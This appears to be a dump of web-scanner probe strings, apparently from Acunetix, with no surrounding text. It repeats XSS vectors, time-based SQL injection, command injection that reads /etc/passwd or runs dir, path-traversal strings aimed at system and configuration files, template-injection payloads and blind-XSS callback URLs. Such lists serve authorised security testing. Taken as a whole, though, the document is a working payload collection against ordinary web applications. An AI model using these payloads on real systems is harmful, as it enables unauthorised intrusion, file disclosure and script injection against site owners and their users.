'+response.write(9750270*9046571)+'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960150)"></g></svg>

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9750270*9046571)+"

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(901898))>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1

1

1

1

1<iframe src='data:text/html

1

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

1

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

-1)

1

1<body onload=prompt(980390)>

1

1

${99670+99437}

1

1

"|"ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973562)>

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n924396=v918340

)

1

1

1some_inexistent_file_with_long_name%00.jpg

TWEifTdU'

1<img src=xyz OnErRor=prompt(922014)>

!(()&&!|*|*|

'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(958529)>

mWlVcMLd')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

5gL4gvna'))

'

1<ScRiPt%20>prompt(989339)</sCripT>

1

1

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

"

-1

||cat /etc/passwd

1

1

1

/etc/passwd

1

1

\xf6<img acu onmouseover=prompt(928638) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

1

1

&dir

-1)

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1<input autofocus onfocus=prompt(927422)>

http://hitD1yzvTIw5U.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

'&dir&'

comments

1

1

1

gOSBRRBY'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

comments

"&dir&"

yaUT1GyO')

1

[url=http://www.acunetix.com]website security[/url]

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

|dir

UIYhEFlI'))

comments/.

http://www.acunetix.tst

1

1

'"

1

1_lcUZZ <ScRiPt >prompt(906576)</ScRiPt>

1

1

1

1

'|dir

1'"()&%<ScRiPt >prompt(977914)</ScRiPt>

1

1

file:///etc/passwd

<!--

'"()&%<ScRiPt >prompt(970717)</ScRiPt>

"|dir

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_961760

1

WEB-INF/web.xml

1

1

1

1

1

1

1

acu7481\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7481

WEB-INF\web.xml

1

1

1

1

acux9545\xc0\xbez1\xc0\xbcz2a\x90bcxuca9545

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(980558)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1<script>prompt(997748)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(950400)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914506></ScRiPt>

1

................windowswin.ini

1<ScRiPt >prompt(990501)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(909061)">

1

response.write(9640583*9345491)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918877)"></g></svg>

1

1

1

'+response.write(9640583*9345491)+'

1

1<div style=width:expression(prompt(961464))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

"+response.write(9640583*9345491)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(974583)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

WEB-INF/web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(926033)>

1

`cat /etc/passwd`

-1

1

1<img src=xyz OnErRor=prompt(956212)>

1

WEB-INF\web.xml

${99762+99829}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(933013)>

-1)

|cat /etc/passwd#

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(931052)</sCripT>

1

'|'ld

-1))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&n947469=v946632

)

/etc/passwd

PcOkCIbB'

"|"ld

1

'"()

1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(926712) //\xf6>

!(()&&!|*|*|

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

hpq9vzRM')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(960542)>

1

1

MRU3Aa74'))

1

'

1

<a href='http://www.acunetix.com'>website security</a>

1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

http://hittiS2bgoCwH.bxss.me/

-1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

-1)

1

1_plmMU <ScRiPt >prompt(906588)</ScRiPt>

acunetix_wvs_invalid_filename

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1

-1))

comments

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

1

cugiMSCD'

http://www.acunetix.tst

'&dir&'

1

comments

1

1

1

1

"&dir&"

comments/.

1

1

DqJZj15Z')

WEB-INF/web.xml

|dir

1'"()&%<ScRiPt >prompt(919781)</ScRiPt>

'"

1

1

WEB-INF\web.xml

i7qJNfCd'))

1

1

'|dir

1

<!--

'"()&%<ScRiPt >prompt(944940)</ScRiPt>

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

1_919759

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu4252\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4252

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux9919\xc0\xbez1\xc0\xbcz2a\x90bcxuca9919

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(902669)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(956461)</script>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(975825)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901718></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(965294)</ScRiPt>

1

1

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(945242)">

1

1

WEB-INF\web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944141)"></g></svg>

1

1

1

response.write(9593054*9334837)

1

1<div style=width:expression(prompt(925804))>

1

&cat /etc/passwd&

'+response.write(9593054*9334837)+'

1

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

1

1

"+response.write(9593054*9334837)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(903380)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900189)>

-1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

1<img src=xyz OnErRor=prompt(984000)>

1

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99823+99588}

-1))

'|'ld

1

1<img/src=">" onerror=alert(924542)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

3kwgDYnt'

1

1

1&n908127=v980626

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

zLPgkoR6')

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(967253)</sCripT>

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

6yyGysgx'))

'

1&lt

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'"()

"

1

1

\xf6<img acu onmouseover=prompt(999230) //\xf6>

'

1

-1)

1

||cat /etc/passwd

^(#$!@#$)(()))******

/etc/passwd

1

1

-1))

"

1

1<input autofocus onfocus=prompt(943469)>

1

oaZXInv9'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

http://hitSgkaWOWEqa.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

HeRQr07x')

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

9cQsg0gt'))

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

comments

"&dir&"

1

1

1_zcj8O <ScRiPt >prompt(971488)</ScRiPt>

1

1

file:///etc/passwd

|dir

1

comments/.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

'"

1

1

WEB-INF/web.xml

1

1

1'"()&%<ScRiPt >prompt(918875)</ScRiPt>

1

1

"|dir

<!--

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(968279)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1_933174

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu1441\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1441

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux10746\xc0\xbez1\xc0\xbcz2a\x90bcxuca10746

................windowswin.ini

1

1<ScRiPt >prompt(983442)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(959987)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(969369)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904259></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(910715)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(942779)">

response.write(9778962*9746126)

WEB-INF/web.xml

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980154)"></g></svg>

'+response.write(9778962*9746126)+'

WEB-INF\web.xml

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(998726))>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

"+response.write(9778962*9746126)+"

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

"&cat /etc/passwd&"

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(989672)>

1

1

cat /etc/passwd

${100067+99853}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952244)>

1

1

1

`cat /etc/passwd`

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

)

1&n991210=v906826

1

1<img src=xyz OnErRor=prompt(945626)>

1some_inexistent_file_with_long_name%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

99q0Kv1N'

'|'ld

!(()&&!|*|*|

1<img/src=">" onerror=alert(989202)>

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

J0p9wRWf')

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(901774)</sCripT>

testasp.vulnweb.com

1

1

'"()

1

/etc/passwd

1&lt

KH418Gdr'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

'

1

\xf6<img acu onmouseover=prompt(917797) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

1<input autofocus onfocus=prompt(968306)>

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

http://hitvr1o44LyKp.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

acunetix_wvs_invalid_filename

1

1

S6vAaqAE'

1

file:///etc/passwd

[url=http://www.acunetix.com]website security[/url]

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

zyAsWvMC')

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

'"

1

1

comments

1_dvJfD <ScRiPt >prompt(976465)</ScRiPt>

'&dir&'

<!--

1

WEB-INF/web.xml

duFUCBX2'))

1

"&dir&"

comments/.

1'"()&%<ScRiPt >prompt(975619)</ScRiPt>

1

1

1

1

1

WEB-INF\web.xml

|dir

1

'"()&%<ScRiPt >prompt(925147)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

1_962297

1

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

acu5436\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5436

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2047\xc0\xbez1\xc0\xbcz2a\x90bcxuca2047

1

1

1

1<ScRiPt >prompt(987329)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(981813)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(952627)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908115></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(995791)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(963121)">

1

1

WEB-INF/web.xml

response.write(9849938*9642435)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981149)"></g></svg>

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(940403))>

1

'+response.write(9849938*9642435)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

"+response.write(9849938*9642435)+"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<body onload=prompt(938986)>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943864)>

${99747+99177}

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

-1

1

1

1

1<img src=xyz OnErRor=prompt(965142)>

1

`cat /etc/passwd`

-1)

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

)

1&n912202=v990119

1<img/src=">" onerror=alert(948637)>

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

'|'ld

1

1<ScRiPt%20>prompt(987400)</sCripT>

!(()&&!|*|*|

testasp.vulnweb.com

1

H4Ule98E'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

'"()

^(#$!@#$)(()))******

1&lt

1

qZxNoNos')

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(902181) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

YrKphJ1t'))

1

1

1

1

'

/etc/passwd

1<input autofocus onfocus=prompt(922473)>

1

1

"

-1

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

acunetix_wvs_invalid_filename

1

-1)

http://hit0m4143EDPp.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

||cat /etc/passwd

comments

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

1_D2Ibe <ScRiPt >prompt(987082)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

vPhTav4p'

comments

&dir

1

1

1

'"

1

http://www.acunetix.tst

nMVSwxPu')

comments/.

1'"()&%<ScRiPt >prompt(934881)</ScRiPt>

1

1

'&dir&'

<!--

1

1

1

LKLgL6Ee'))

'"()&%<ScRiPt >prompt(926784)</ScRiPt>

1

"&dir&"

1

1

1

file:///etc/passwd

1

1_916007

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

'|dir

1

1

1

WEB-INF/web.xml

1

"|dir

acu1968\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1968

WEB-INF\web.xml

1

1

1

acux8137\xc0\xbez1\xc0\xbcz2a\x90bcxuca8137

1

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(918715)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(939234)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(986788)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976454></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

1<ScRiPt >prompt(984191)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(985855)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929713)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(933008))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9983030*9673908)

1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9983030*9673908)+'

&cat /etc/passwd&

1

1<body onload=prompt(993361)>

'&cat /etc/passwd&'

"+response.write(9983030*9673908)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(920054)>

1

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(930193)>

WEB-INF\web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<img/src=">" onerror=alert(994448)>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

${100394+100278}

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(950685)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

1

1&lt

1

1&n909023=v914631

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

\xf6<img acu onmouseover=prompt(911742) //\xf6>

)

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<input autofocus onfocus=prompt(921073)>

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1

"|"ld

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

By3fx5XD'

1

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

'

'"()

1

'

1

1

7oaxLUQc')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

"

1

1_2MOn5 <ScRiPt >prompt(970995)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

l3IrWuBu'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

http://hit1Z4MXmVgds.bxss.me/

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

'&dir&'

1

acunetix_wvs_invalid_filename

1

-1))

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

file:///etc/passwd

'"

gpCnOIX1'

comments

1

1

|dir

<!--

1'"()&%<ScRiPt >prompt(941692)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

comments

1

uSjV8pfK')

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(902343)</ScRiPt>

"|dir

comments/.

1

DRksQVsT'))

1

1

1

1

1

1_949707

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu7477\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7477

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux4344\xc0\xbez1\xc0\xbcz2a\x90bcxuca4344

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(996991)</ScRiPt>

1

1

................windowswin.ini

1

1

1

1<script>prompt(972097)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(990517)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950190></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

